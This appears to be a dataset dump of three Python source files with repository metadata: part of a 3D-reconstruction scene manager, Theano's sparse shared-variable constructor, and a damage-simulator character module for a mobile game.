for point3D_idx in self.point3D_id_to_point3D_idx.values()
if point3D_idx != SceneManager.INVALID_POINT3D
)
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", num_valid_points3D))
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
fid.write(struct.pack("L", point3D_id))
fid.write(self.points3D[point3D_idx].tobytes())
fid.write(self.point3D_colors[point3D_idx].tobytes())
fid.write(self.point3D_errors[point3D_idx].tobytes())
fid.write(struct.pack("L", len(self.point3D_id_to_images[point3D_id])))
fid.write(self.point3D_id_to_images[point3D_id].tobytes())
def _save_points3D_txt(self, output_file):
num_valid_points3D = sum(
1
for point3D_idx in self.point3D_id_to_point3D_idx.values()
if point3D_idx != SceneManager.INVALID_POINT3D
)
array_to_string = lambda arr: " ".join(str(x) for x in arr)
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
with open(output_file, "w") as fid:
print("# 3D point list with one line of data per point:", file=fid)
print("# POINT3D_ID, X, Y, Z, R, G, B, ERROR, TRACK[] as ", file=fid)
print("# (IMAGE_ID, POINT2D_IDX)", file=fid)
print("# Number of points: {},".format(num_valid_points3D), file=fid)
print("# mean track length: unknown", file=fid)
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
print(point3D_id, file=fid)
print(array_to_string(self.points3D[point3D_idx]), file=fid)
print(array_to_string(self.point3D_colors[point3D_idx]), file=fid)
print(self.point3D_errors[point3D_idx], file=fid)
print(
array_to_string(self.point3D_id_to_images[point3D_id].flat),
file=fid,
)
# ---------------------------------------------------------------------------
# return the image id associated with a given image file
def get_image_from_name(self, image_name):
image_id = self.name_to_image_id[image_name]
return image_id, self.images[image_id]
# ---------------------------------------------------------------------------
def get_camera(self, camera_id):
return self.cameras[camera_id]
# ---------------------------------------------------------------------------
def get_points3D(self, image_id, return_points2D=True, return_colors=False):
image = self.images[image_id]
mask = image.point3D_ids != SceneManager.INVALID_POINT3D
point3D_idxs = np.array(
[
self.point3D_id_to_point3D_idx[point3D_id]
for point3D_id in image.point3D_ids[mask]
]
)
# detect filtered points
filter_mask = point3D_idxs != SceneManager.INVALID_POINT3D
point3D_idxs = point3D_idxs[filter_mask]
result = [self.points3D[point3D_idxs, :]]
if return_points2D:
mask[mask] &= filter_mask
result += [image.points2D[mask]]
if return_colors:
result += [self.point3D_colors[point3D_idxs, :]]
return result if len(result) > 1 else result[0]
# ---------------------------------------------------------------------------
def point3D_valid(self, point3D_id):
return (
self.point3D_id_to_point3D_idx[point3D_id] != SceneManager.INVALID_POINT3D
)
# ---------------------------------------------------------------------------
def get_filtered_points3D(self, return_colors=False):
point3D_idxs = [
idx
for idx in self.point3D_id_to_point3D_idx.values()
if idx != SceneManager.INVALID_POINT3D
]
result = [self.points3D[point3D_idxs, :]]
if return_colors:
result += [self.point3D_colors[point3D_idxs, :]]
return result if len(result) > 1 else result[0]
# ---------------------------------------------------------------------------
# return 3D points shared by two images
def get_shared_points3D(self, image_id1, image_id2):
point3D_ids = set(self.images[image_id1].point3D_ids) & set(
self.images[image_id2].point3D_ids
)
point3D_ids.discard(SceneManager.INVALID_POINT3D)
point3D_idxs = np.array(
[self.point3D_id_to_point3D_idx[point3D_id] for point3D_id in point3D_ids]
)
return self.points3D[point3D_idxs, :]
# ---------------------------------------------------------------------------
# project *all* 3D points into image, return their projection coordinates,
# as well as their 3D positions
def get_viewed_points(self, image_id):
image = self.images[image_id]
# get unfiltered points
point3D_idxs = set(self.point3D_id_to_point3D_idx.values())
point3D_idxs.discard(SceneManager.INVALID_POINT3D)
point3D_idxs = list(point3D_idxs)
points3D = self.points3D[point3D_idxs, :]
# orient points relative to camera
R = image.q.ToR()
points3D = points3D.dot(R.T) + image.tvec[np.newaxis, :]
points3D = points3D[points3D[:, 2] > 0, :] # keep points with positive z
# put points into image coordinates
camera = self.cameras[image.camera_id]
points2D = points3D.dot(camera.get_camera_matrix().T)
points2D = points2D[:, :2] / points2D[:, 2][:, np.newaxis]
# keep points that are within the image
mask = (
(points2D[:, 0] >= 0)
& (points2D[:, 1] >= 0)
& (points2D[:, 0] < camera.width - 1)
& (points2D[:, 1] < camera.height - 1)
)
return points2D[mask, :], points3D[mask, :]
# ---------------------------------------------------------------------------
def add_camera(self, camera):
self.last_camera_id += 1
self.cameras[self.last_camera_id] = camera
return self.last_camera_id
# ---------------------------------------------------------------------------
def add_image(self, image):
self.last_image_id += 1
self.images[self.last_image_id] = image
return self.last_image_id
# ---------------------------------------------------------------------------
def delete_images(self, image_list):
# delete specified images
for image_id in image_list:
if image_id in self.images:
del self.images[image_id]
keep_set = set(self.images.iterkeys())
# delete references to specified images, and ignore any points that are
# invalidated
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
mask = np.array(
[
image_id in keep_set
for image_id in self.point3D_id_to_images[point3D_id][:, 0]
]
)
if np.any(mask):
self.point3D_id_to_images[point3D_id] = self.point3D_id_to_images[
point3D_id
][mask]
else:
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# ---------------------------------------------------------------------------
# camera_list: set of cameras whose points we'd like to keep
def filter_points3D(
self,
min_track_len=0,
max_error=np.inf,
min_tri_angle=0,
max_tri_angle=180,
image_set=set(),
):
image_set = set(image_set)
check_triangulation_angles = min_tri_angle > 0 or max_tri_angle < 180
if check_triangulation_angles:
max_tri_prod = np.cos(np.radians(min_tri_angle))
min_tri_prod = np.cos(np.radians(max_tri_angle))
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
image_ids = []
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
if image_set or min_track_len > 0:
image_ids = set(self.point3D_id_to_images[point3D_id][:, 0])
if (
len(image_ids) < min_track_len
or self.point3D_errors[point3D_idx] > max_error
or image_set
and image_set.isdisjoint(image_ids)
):
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
elif check_triangulation_angles:
xyz = self.points3D[point3D_idx, :]
tvecs = np.array(
[(self.images[image_id].tvec - xyz) for image_id in image_ids]
)
tvecs /= np.linalg.norm(tvecs, axis=-1)[:, np.newaxis]
cos_theta = np.array([u.dot(v) for u, v in combinations(tvecs, 2)])
if np.min(cos_theta) > max_tri_prod or np.max(cos_theta) < min_tri_prod:
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# apply the filters to the image point3D_ids
for image in self.images.values():
mask = np.array(
[
self.point3D_id_to_point3D_idx.get(point3D_id, 0)
== SceneManager.INVALID_POINT3D
for point3D_id in image.point3D_ids
]
)
image.point3D_ids[mask] = SceneManager.INVALID_POINT3D
# ---------------------------------------------------------------------------
# scene graph: {image_id: [image_id: #shared points]}
def build_scene_graph(self):
self.scene_graph = defaultdict(lambda: defaultdict(int))
point3D_iter = self.point3D_id_to_images.items()
for i, (point3D_id, images) in enumerate(point3D_iter):
if not self.point3D_valid(point3D_id):
continue
for image_id1, image_id2 in combinations(images[:, 0], 2):
self.scene_graph[image_id1][image_id2] += 1
self.scene_graph[image_id2][image_id1] += 1
| true
| true
|
f70b8176857a7599c2af9d3e6c1fa9b31a2be0ce
| 1,151
|
py
|
Python
|
theano/sparse/sharedvar.py
|
MarcCote/Theano
|
f0d293161a624ccf10c60ee8405a92e7d321151a
|
[
"BSD-3-Clause"
] | 95
|
2019-05-14T20:55:26.000Z
|
2022-03-26T13:32:42.000Z
|
theano/sparse/sharedvar.py
|
MarcCote/Theano
|
f0d293161a624ccf10c60ee8405a92e7d321151a
|
[
"BSD-3-Clause"
] | 7
|
2019-11-25T08:24:47.000Z
|
2021-09-12T13:29:14.000Z
|
theano/sparse/sharedvar.py
|
MarcCote/Theano
|
f0d293161a624ccf10c60ee8405a92e7d321151a
|
[
"BSD-3-Clause"
] | 30
|
2016-10-27T21:59:00.000Z
|
2021-02-20T09:55:14.000Z
|
from __future__ import absolute_import, print_function, division
import copy
import scipy.sparse
from theano.compile import shared_constructor, SharedVariable
from theano.sparse.basic import SparseType, _sparse_py_operators
class SparseTensorSharedVariable(_sparse_py_operators, SharedVariable):
dtype = property(lambda self: self.type.dtype)
format = property(lambda self: self.type.format)
@shared_constructor
def sparse_constructor(value, name=None, strict=False, allow_downcast=None,
borrow=False, format=None):
"""
SharedVariable Constructor for SparseType.
writeme
"""
if not isinstance(value, scipy.sparse.spmatrix):
raise TypeError("Expected a sparse matrix in the sparse shared variable constructor. Received: ",
value.__class__)
if format is None:
format = value.format
type = SparseType(format=format, dtype=value.dtype)
if not borrow:
value = copy.deepcopy(value)
return SparseTensorSharedVariable(type=type, value=value, name=name,
strict=strict, allow_downcast=allow_downcast)
| 34.878788
| 105
| 0.709818
|
from __future__ import absolute_import, print_function, division
import copy
import scipy.sparse
from theano.compile import shared_constructor, SharedVariable
from theano.sparse.basic import SparseType, _sparse_py_operators
class SparseTensorSharedVariable(_sparse_py_operators, SharedVariable):
dtype = property(lambda self: self.type.dtype)
format = property(lambda self: self.type.format)
@shared_constructor
def sparse_constructor(value, name=None, strict=False, allow_downcast=None,
borrow=False, format=None):
if not isinstance(value, scipy.sparse.spmatrix):
raise TypeError("Expected a sparse matrix in the sparse shared variable constructor. Received: ",
value.__class__)
if format is None:
format = value.format
type = SparseType(format=format, dtype=value.dtype)
if not borrow:
value = copy.deepcopy(value)
return SparseTensorSharedVariable(type=type, value=value, name=name,
strict=strict, allow_downcast=allow_downcast)
| true
| true
|
f70b82a48614719ef93b9151d17a35ed981f6a36
| 3,177
|
py
|
Python
|
adv/aldred.py
|
6tennis/dl
|
69eb7e71da9fabe9e7ec40c461b525b4f967f345
|
[
"Apache-2.0"
] | null | null | null |
adv/aldred.py
|
6tennis/dl
|
69eb7e71da9fabe9e7ec40c461b525b4f967f345
|
[
"Apache-2.0"
] | null | null | null |
adv/aldred.py
|
6tennis/dl
|
69eb7e71da9fabe9e7ec40c461b525b4f967f345
|
[
"Apache-2.0"
] | null | null | null |
from core.advbase import *
from slot.a import *
def module():
return Aldred
class Aldred(Adv):
comment = 'maintain dragondrive'
conf = {}
conf['slots.a'] = Heralds_of_Hinomoto()+Dear_Diary()
conf['slots.poison.a'] = Heralds_of_Hinomoto()+The_Plaguebringer()
conf['acl'] = """
`s3, not self.s3_buff
`s2
`dragon, not self.dragondrive_buff.get()
`s1, x=5
"""
coab = ['Wand','Berserker','Curran']
def prerun(self):
self.dragondrive_buff = Selfbuff('dragondrive', 0.30, -1, 's', 'passive')
self.dragonform.set_dragondrive(self.dragondrive_buff)
self.a3_str = Modifier('a3', 'att', 'passive', 0.20)
self.s2_str = Selfbuff('s2', 0.20, -1, 'att', 'buff') # doesnt proc doublebuff reeeee
self.s2_tick = Timer(self.s2_degen, 2.9, 1)
self.s2_stuff_timer = Timer(self.s2_stuff_off)
self.s2_on = False
self.hp = 100
self.conf.x1.utp = 120
self.conf.x2.utp = 120
self.conf.x3.utp = 120
self.conf.x4.utp = 180
self.conf.x5.utp = 180
def d_slots(self):
if self.duration <= 60:
self.conf['slots.a'] = The_Chocolatiers()+TL()
self.conf['slots.poison.a'] = The_Chocolatiers()+The_Plaguebringer()
def x_proc(self, e):
if self.dragondrive_buff.get():
try:
utp = self.conf[e.name].utp
self.dragonform.charge_gauge(utp, utp=True)
except:
pass
def s1_proc(self, e):
if self.dragondrive_buff.get():
with CrisisModifier('s1', 1.00, self.hp):
self.dmg_make('s1', 2.42*4)
self.dragonform.add_drive_gauge_time(self.s1.ac.getstartup()+self.s1.ac.getrecovery(), skill_pause=True)
self.dragonform.charge_gauge(-750, utp=True)
self.s1.charge(self.sp_convert(0.50, self.conf.s1.sp))
else:
self.dmg_make('s1', 2.42*4)
# 242 * 4 mod, 4 hits, 2.4s
# 242 * 4 w/ 2x crisis
# -750 dd points
# +50% skill gauge
# 2.1666667461395264
def s2_proc(self, e):
if self.dragondrive_buff.get():
self.s2_stuff_on()
self.s2_stuff_timer.on(40 * self.mod('bt'))
self.dragonform.add_drive_gauge_time(self.s2.ac.getstartup()+self.s2.ac.getrecovery(), skill_pause=True)
self.dragonform.charge_gauge(3000, utp=True)
else:
self.dragonform.charge_gauge(1200, utp=True)
# 1 hp loss = 1 gauge gain, will assume 3000 max hp here
if self.hp > 30:
self.dragonform.charge_gauge(3000 * (self.hp-30)/100, utp=True)
self.hp = 30
# +1200 dd points
# 1.3333333730697632s
def s2_stuff_on(self):
self.a3_str.on()
self.s2_str.on()
self.s2_tick.on()
def s2_stuff_off(self, t):
self.a3_str.off()
self.s2_str.off()
self.s2_tick.off()
def s2_degen(self, t):
self.hp = max(self.hp-6, 0)
if __name__ == '__main__':
from core.simulate import test_with_argv
test_with_argv(None, *sys.argv)
| 33.09375
| 116
| 0.575071
|
from core.advbase import *
from slot.a import *
def module():
return Aldred
class Aldred(Adv):
comment = 'maintain dragondrive'
conf = {}
conf['slots.a'] = Heralds_of_Hinomoto()+Dear_Diary()
conf['slots.poison.a'] = Heralds_of_Hinomoto()+The_Plaguebringer()
conf['acl'] = """
`s3, not self.s3_buff
`s2
`dragon, not self.dragondrive_buff.get()
`s1, x=5
"""
coab = ['Wand','Berserker','Curran']
def prerun(self):
self.dragondrive_buff = Selfbuff('dragondrive', 0.30, -1, 's', 'passive')
self.dragonform.set_dragondrive(self.dragondrive_buff)
self.a3_str = Modifier('a3', 'att', 'passive', 0.20)
self.s2_str = Selfbuff('s2', 0.20, -1, 'att', 'buff')
self.s2_tick = Timer(self.s2_degen, 2.9, 1)
self.s2_stuff_timer = Timer(self.s2_stuff_off)
self.s2_on = False
self.hp = 100
self.conf.x1.utp = 120
self.conf.x2.utp = 120
self.conf.x3.utp = 120
self.conf.x4.utp = 180
self.conf.x5.utp = 180
def d_slots(self):
if self.duration <= 60:
self.conf['slots.a'] = The_Chocolatiers()+TL()
self.conf['slots.poison.a'] = The_Chocolatiers()+The_Plaguebringer()
def x_proc(self, e):
if self.dragondrive_buff.get():
try:
utp = self.conf[e.name].utp
self.dragonform.charge_gauge(utp, utp=True)
except:
pass
def s1_proc(self, e):
if self.dragondrive_buff.get():
with CrisisModifier('s1', 1.00, self.hp):
self.dmg_make('s1', 2.42*4)
self.dragonform.add_drive_gauge_time(self.s1.ac.getstartup()+self.s1.ac.getrecovery(), skill_pause=True)
self.dragonform.charge_gauge(-750, utp=True)
self.s1.charge(self.sp_convert(0.50, self.conf.s1.sp))
else:
self.dmg_make('s1', 2.42*4)
def s2_proc(self, e):
if self.dragondrive_buff.get():
self.s2_stuff_on()
self.s2_stuff_timer.on(40 * self.mod('bt'))
self.dragonform.add_drive_gauge_time(self.s2.ac.getstartup()+self.s2.ac.getrecovery(), skill_pause=True)
self.dragonform.charge_gauge(3000, utp=True)
else:
self.dragonform.charge_gauge(1200, utp=True)
if self.hp > 30:
self.dragonform.charge_gauge(3000 * (self.hp-30)/100, utp=True)
self.hp = 30
def s2_stuff_on(self):
self.a3_str.on()
self.s2_str.on()
self.s2_tick.on()
def s2_stuff_off(self, t):
self.a3_str.off()
self.s2_str.off()
self.s2_tick.off()
def s2_degen(self, t):
self.hp = max(self.hp-6, 0)
if __name__ == '__main__':
from core.simulate import test_with_argv
test_with_argv(None, *sys.argv)
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.